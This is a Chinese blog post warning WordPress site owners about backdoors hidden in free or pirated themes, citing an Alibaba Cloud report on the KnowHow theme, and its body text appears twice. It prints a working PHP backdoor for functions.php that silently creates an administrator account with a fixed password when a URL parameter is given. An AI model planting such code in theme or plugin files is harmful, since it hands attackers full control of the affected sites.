2014-11-24 02:06:45
小心免费主题!那些WordPress主题后门,一招拥有管理员权限
WordPress是国内站长非常喜欢采用的一款建站应用软件,由于其具有非常丰富的模版和插件,具有良好的可扩展性。特别对于博客类网站,WordPress几乎成为建站首选。
但是根据阿里云的安全报告,WordPress一直是黑客攻击的主要目标,今天我们就说说WordPress主题后门,免费主题,免费的往往是最贵的,目前我站使用的主题是我自己制作的,请大家放心访问。
[caption id="" align="aligncenter" width="1000"]
小心免费主题!那些WordPress主题后门,一招拥有管理员权限[/caption]
下图是阿里云云盾安全运营团队对第三方应用遭受攻击的统计(Source:第27期阿里云云盾安全运营报告,http://security.aliyun.com/doc/view/13762631.html):
[caption id="" align="aligncenter" width="406"]
WordPress是攻击者最主要的攻击目标之一[/caption]
WordPress存在安全隐患的原因主要在于两个方面:一方面由于应用功能的丰富,程序越来越复杂,WordPress屡暴漏洞在所难免;另一方面提供WordPress主题和插件下载的网站五花八门、鱼龙混杂。很多黑客恰恰利用了这个现状,通过各种提供WordPress建站资源下载的网站散布带有恶意脚本的插件。事实上,上述两方面原因中后者的安全隐患更大。对于一个渴望找到建站资源的网站站长,在下载插件程序时,往往疏于防护,对提供下载资源的来源网站不加选择。
网上很多好的免费主题,破解主题,下载虽然也可以正常使用,但是在你以为正常的时候,很可能就有不正常的事情发生了…… 这次举例的是一段很简单的代码,只需几行代码就可以为主题留下后门,不懂代码的小白就要注意了……
[php]
add_action( "wp_head", "my_backdoor" );
function my_backdoor() {
if ( md5( $_GET["backdoor"] ) == "34d1f91fb2e514b8576fab1a75a89a6b" ) {
require( "wp-includes/registration.php" );
if ( !username_exists( "backdoor" ) ) {
$user_id = wp_create_user( "backdoor", "pa55w0rd!" );
$user = new WP_User( $user_id );
$user->set_role( "administrator" );
}
}
}
[/php]
从上面代码,大概简单说明下,代码主要放于functions.php文件里面,不会影响任何功能使用,如果存在此代码,任何人只要运行http://www.你的域名.com/?backdoor=go,然后就创建了一个用户名为“backdoor”,密码为:“pa55w0rd!” 的管理员。
同样具备管理员的权限,很编辑主题代码文件,相信此时你一定感觉到很危险了吧,赶紧检查检查自己的主题代码吧……
云盾安全技术团队还在不久前截获了一个带有后门的WordPress程序。这个后门程序存在于WordPress一个叫做“KnowHow”的主题插件中。在这个插件里,发现如下代码:
[caption id="" align="aligncenter" width="423"]
WordPress主题程序中的后门[/caption]
红圈内的代码,很显然,就是后门。攻击者利用这个后门可以进一步获得网站的控制权。
经过云盾安全技术人员进一步调查,KnowHow是一款非常流行的WordPress主题。KowHow主题是收费的,价格为48美金。为了明确问题的根源,技术人员决定从确定被植入后门的程序来源入手。
和用户沟通后证实,该用户并非购买的正版主题,而是从国内某偏僻站点下载。与此同时,从官方渠道下载了一份同版本的主题程序,两者进行了比较。结果证实官方版本中并没有相对应的后门代码。因此,用户下载的程序显然是被人恶意修改后发布的版本。
云盾安全技术人员接下来经过搜索和对比, 发现大量国内此主题的下载文件中被人嵌入了类似的后门。
在明确了后门问题的原因后,云盾安全运营团队立刻对阿里云全网用户进行了扫描,并在第一时间通知了存在类似安全隐患的阿里云用户。
最后,对于WordPress KnowHow主题后门,阿里云云盾安全运营团队提出如下建议:
第一,请已下载并安装Knowhow主题的站长尽快检查自己的网站服务器,找到 /wp-content/themes/knowhow/functions.php文件,对比上文检查是否存在恶意代码。后门特征一般含有eval字符;
第二,从官方或具有良好信誉的网站下载插件,不要随意下载/添加不明站点的代码;
第三,请购买正版软件。
小心免费主题!那些WordPress主题后门,一招拥有管理员权限[/caption]
下图是阿里云云盾安全运营团队对第三方应用遭受攻击的统计(Source:第27期阿里云云盾安全运营报告,http://security.aliyun.com/doc/view/13762631.html):
[caption id="" align="aligncenter" width="406"]
WordPress是攻击者最主要的攻击目标之一[/caption]
WordPress存在安全隐患的原因主要在于两个方面:一方面由于应用功能的丰富,程序越来越复杂,WordPress屡暴漏洞在所难免;另一方面提供WordPress主题和插件下载的网站五花八门、鱼龙混杂。很多黑客恰恰利用了这个现状,通过各种提供WordPress建站资源下载的网站散布带有恶意脚本的插件。事实上,上述两方面原因中后者的安全隐患更大。对于一个渴望找到建站资源的网站站长,在下载插件程序时,往往疏于防护,对提供下载资源的来源网站不加选择。
网上很多好的免费主题,破解主题,下载虽然也可以正常使用,但是在你以为正常的时候,很可能就有不正常的事情发生了…… 这次举例的是一段很简单的代码,只需几行代码就可以为主题留下后门,不懂代码的小白就要注意了……
[php]
add_action( "wp_head", "my_backdoor" );
function my_backdoor() {
if ( md5( $_GET["backdoor"] ) == "34d1f91fb2e514b8576fab1a75a89a6b" ) {
require( "wp-includes/registration.php" );
if ( !username_exists( "backdoor" ) ) {
$user_id = wp_create_user( "backdoor", "pa55w0rd!" );
$user = new WP_User( $user_id );
$user->set_role( "administrator" );
}
}
}
[/php]
从上面代码,大概简单说明下,代码主要放于functions.php文件里面,不会影响任何功能使用,如果存在此代码,任何人只要运行http://www.你的域名.com/?backdoor=go,然后就创建了一个用户名为“backdoor”,密码为:“pa55w0rd!” 的管理员。
同样具备管理员的权限,很编辑主题代码文件,相信此时你一定感觉到很危险了吧,赶紧检查检查自己的主题代码吧……
云盾安全技术团队还在不久前截获了一个带有后门的WordPress程序。这个后门程序存在于WordPress一个叫做“KnowHow”的主题插件中。在这个插件里,发现如下代码:
[caption id="" align="aligncenter" width="423"]
WordPress主题程序中的后门[/caption]
红圈内的代码,很显然,就是后门。攻击者利用这个后门可以进一步获得网站的控制权。
经过云盾安全技术人员进一步调查,KnowHow是一款非常流行的WordPress主题。KowHow主题是收费的,价格为48美金。为了明确问题的根源,技术人员决定从确定被植入后门的程序来源入手。
和用户沟通后证实,该用户并非购买的正版主题,而是从国内某偏僻站点下载。与此同时,从官方渠道下载了一份同版本的主题程序,两者进行了比较。结果证实官方版本中并没有相对应的后门代码。因此,用户下载的程序显然是被人恶意修改后发布的版本。
云盾安全技术人员接下来经过搜索和对比, 发现大量国内此主题的下载文件中被人嵌入了类似的后门。
在明确了后门问题的原因后,云盾安全运营团队立刻对阿里云全网用户进行了扫描,并在第一时间通知了存在类似安全隐患的阿里云用户。
最后,对于WordPress KnowHow主题后门,阿里云云盾安全运营团队提出如下建议:
第一,请已下载并安装Knowhow主题的站长尽快检查自己的网站服务器,找到 /wp-content/themes/knowhow/functions.php文件,对比上文检查是否存在恶意代码。后门特征一般含有eval字符;
第二,从官方或具有良好信誉的网站下载插件,不要随意下载/添加不明站点的代码;
第三,请购买正版软件。商业用途请联系作者获得授权。
版权声明:本文为博主「任霏」原创文章,遵循 CC BY-NC-SA 4.0 版权协议,转载请附上原文出处链接及本声明。
相关推荐
猜你还喜欢这些内容,不妨试试阅读一下评论与留言
以下内容均由网友提交发布,版权与真实性无法查证,请自行辨别。微信订阅号
扫码关注「任霏博客」微信订阅号内容标签
最新留言
- 你写得非常清晰明了,让我很容易理解你的观点。
- 感谢分享!拿走了~
- 您是说 UCClient 类接收来自Discuz的UCenter的消息吧,请求是来自 Discuz 的 UCenter吗?code 为 null 说明请求URL地址中没有 code 参数 (?code=xxx) ,确定是 UCenter 发起的请求吗?
- String code = request.getParameter("code"); code一直是null 这是为什么啊
- 你好,我想问一下如果是分析型的数据库要怎么制作docker镜像呢 是修改V008R003C002B0320版本号吗
- 可以的,我也正在开发分享的程序,可以邮件或群联系我都可以,关于页面里有联系方式:https://www.renfei.net/page/about 。
- 有破解软件的需要可以私下联系您吗?
- 您好,手机APP只是个客户端,用于数据呈现展示,数据均保存在服务器上,只留个APP没有任何用处,无能为力哦。
- 老哥 看你弄了这么多软件好厉害啊。 我有个软件 我买过几个小会员 没用几天 然后商家跑路了,软件服务器关闭了,连不上去 用不了。 你能做成一个打补丁版本可以本地用的么? 方便看下么?https://haodezhe.lanzouw.com/iD0f30h9joza 谢谢老哥!
- 您好,由于版权投诉和我国知识产权法的完善,我已经下架所有破解软件的下载链接了。
热文排行
- 生花妙笔信手来 – 基于 Amazon SageMaker 使用 Grounded-SAM 加速电商广告素材生成 [1]
- github.renfei.net 不再完整代理 Github 页面改为代理指定文件
- 优雅的源代码管理(三):本地优雅的使用 Git Rebase 变基
- 优雅的源代码管理(二):Git 的工作原理
- 优雅的源代码管理(一):版本控制系统 VCS(Version Control System)与软件配置管理 SCM(Software Configuration Management)
- ChatGPT 开发商 OpenAI 买下极品域名 AI.com
- 火爆的 AI 人工智能 ChatGPT 国内注册教程、使用方式和收费标准
- 解决 SpringCloud 中 bootstrap.yml 不识别 @activatedProperties@ 参数
- Cron表达式书写教程搞定Linux、Spring、Quartz的定时任务
- 阿里云香港可用区C发生史诗级故障